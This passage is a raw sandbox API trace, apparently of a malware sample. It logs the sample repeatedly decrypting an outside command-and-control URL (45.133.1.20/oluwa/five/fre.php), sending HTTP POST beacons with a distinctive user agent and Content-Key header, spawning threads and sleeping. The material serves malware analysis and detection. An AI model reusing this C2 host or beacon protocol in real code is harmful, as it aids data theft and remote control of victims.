(lpLibFileName="shlwapi") returned 0x77680000 [0194.374] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0194.374] GetProcessHeap () returned 0x6a0000 [0194.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0194.374] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0194.374] GetProcessHeap () returned 0x6a0000 [0194.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0194.374] socket (af=2, type=1, protocol=6) returned 0x4cc [0194.374] connect (s=0x4cc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0194.399] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0194.399] GetProcessHeap () returned 0x6a0000 [0194.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0194.399] GetProcessHeap () returned 0x6a0000 [0194.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0194.400] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0194.400] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0194.401] GetProcessHeap () returned 0x6a0000 [0194.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0194.401] GetProcessHeap () returned 0x6a0000 [0194.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0194.401] GetProcessHeap () returned 0x6a0000 [0194.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0194.401] GetProcessHeap () returned 0x6a0000 [0194.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0194.402] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0194.403] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0194.403] GetProcessHeap () returned 0x6a0000 [0194.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0194.404] GetProcessHeap () returned 0x6a0000 [0194.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0194.405] send (s=0x4cc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0194.405] send (s=0x4cc, buf=0x6bb998*, len=159, flags=0) returned 159 [0194.405] GetProcessHeap () returned 0x6a0000 [0194.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0194.405] recv (in: s=0x4cc, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0194.484] GetProcessHeap () returned 0x6a0000 [0194.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0194.485] GetProcessHeap () returned 0x6a0000 [0194.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0194.485] GetProcessHeap () returned 0x6a0000 [0194.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0194.486] GetProcessHeap () returned 0x6a0000 [0194.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0194.486] closesocket (s=0x4cc) returned 0 [0194.486] GetProcessHeap () returned 0x6a0000 [0194.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0194.487] GetProcessHeap () returned 0x6a0000 [0194.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0194.487] GetProcessHeap () returned 0x6a0000 [0194.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0194.487] GetProcessHeap () returned 0x6a0000 [0194.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0194.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x134c) returned 0x4cc [0194.491] Sleep (dwMilliseconds=0xea60) [0194.493] GetProcessHeap () returned 0x6a0000 [0194.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0194.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.494] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.505] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0194.598] GetProcessHeap () returned 0x6a0000 [0194.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0194.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.629] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0194.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.631] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.632] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.632] GetProcessHeap () returned 0x6a0000 [0194.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0194.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.655] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0194.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.656] CryptDestroyKey (hKey=0x6ad520) returned 1 [0194.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.658] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0194.658] GetProcessHeap () returned 0x6a0000 [0194.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0194.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.659] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0194.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.665] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0194.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.666] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0194.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.667] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0194.667] GetProcessHeap () returned 0x6a0000 [0194.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0194.668] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0194.668] GetProcessHeap () returned 0x6a0000 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0194.669] GetProcessHeap () returned 0x6a0000 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0194.669] GetProcessHeap () returned 0x6a0000 [0194.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0194.669] GetProcessHeap () returned 0x6a0000 [0194.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0194.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.685] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.692] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0194.704] GetProcessHeap () returned 0x6a0000 [0194.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0194.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.708] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0194.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.709] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.711] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.711] GetProcessHeap () returned 0x6a0000 [0194.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0194.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.712] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0194.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.714] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0194.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.715] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0194.715] GetProcessHeap () returned 0x6a0000 [0194.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0194.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.717] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0194.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.718] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0194.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.719] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0194.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.721] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0194.721] GetProcessHeap () returned 0x6a0000 [0194.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0194.721] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0194.721] GetProcessHeap () returned 0x6a0000 [0194.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0194.721] socket (af=2, type=1, protocol=6) returned 0x4d0 [0194.722] connect (s=0x4d0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0194.753] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0194.753] GetProcessHeap () returned 0x6a0000 [0194.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0194.753] GetProcessHeap () returned 0x6a0000 [0194.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0194.754] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0194.755] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0194.756] GetProcessHeap () returned 0x6a0000 [0194.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0194.756] GetProcessHeap () returned 0x6a0000 [0194.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0194.756] GetProcessHeap () returned 0x6a0000 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0194.757] GetProcessHeap () returned 0x6a0000 [0194.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0194.757] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0194.759] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0194.759] GetProcessHeap () returned 0x6a0000 [0194.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0194.759] GetProcessHeap () returned 0x6a0000 [0194.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0194.759] send (s=0x4d0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0194.760] send (s=0x4d0, buf=0x6bb998*, len=159, flags=0) returned 159 [0194.760] GetProcessHeap () returned 0x6a0000 [0194.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0194.760] recv (in: s=0x4d0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0194.832] GetProcessHeap () returned 0x6a0000 [0194.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0194.832] GetProcessHeap () returned 0x6a0000 [0194.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0194.833] GetProcessHeap () returned 0x6a0000 [0194.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0194.834] GetProcessHeap () returned 0x6a0000 [0194.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0194.834] closesocket (s=0x4d0) returned 0 [0194.835] GetProcessHeap () returned 0x6a0000 [0194.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0194.835] GetProcessHeap () returned 0x6a0000 [0194.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0194.835] GetProcessHeap () returned 0x6a0000 [0194.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0194.836] GetProcessHeap () returned 0x6a0000 [0194.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0194.838] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x624) returned 0x4d0 [0194.840] Sleep (dwMilliseconds=0xea60) [0194.844] GetProcessHeap () returned 0x6a0000 [0194.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0194.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.847] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.856] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0194.984] GetProcessHeap () returned 0x6a0000 [0194.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0194.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.986] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0194.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.995] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.996] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.996] GetProcessHeap () returned 0x6a0000 [0194.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0194.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.998] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0194.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.000] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0195.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.001] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0195.001] GetProcessHeap () returned 0x6a0000 [0195.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.003] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.040] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.042] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.043] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.043] GetProcessHeap () returned 0x6a0000 [0195.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0195.043] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.044] GetProcessHeap () returned 0x6a0000 [0195.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0195.044] GetProcessHeap () returned 0x6a0000 [0195.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0195.045] GetProcessHeap () returned 0x6a0000 [0195.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0195.045] GetProcessHeap () returned 0x6a0000 [0195.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0195.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.047] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.057] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0195.074] GetProcessHeap () returned 0x6a0000 [0195.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0195.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.076] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0195.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.077] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.079] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.079] GetProcessHeap () returned 0x6a0000 [0195.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0195.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.081] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0195.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.082] CryptDestroyKey (hKey=0x6ad020) returned 1 [0195.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0195.083] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0195.083] GetProcessHeap () returned 0x6a0000 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0195.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.085] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0195.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.086] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0195.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.090] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0195.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0195.092] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0195.092] GetProcessHeap () returned 0x6a0000 [0195.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0195.092] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0195.092] GetProcessHeap () returned 0x6a0000 [0195.092] RtlAllocateHeap (HeapHandle=0x6a0000, 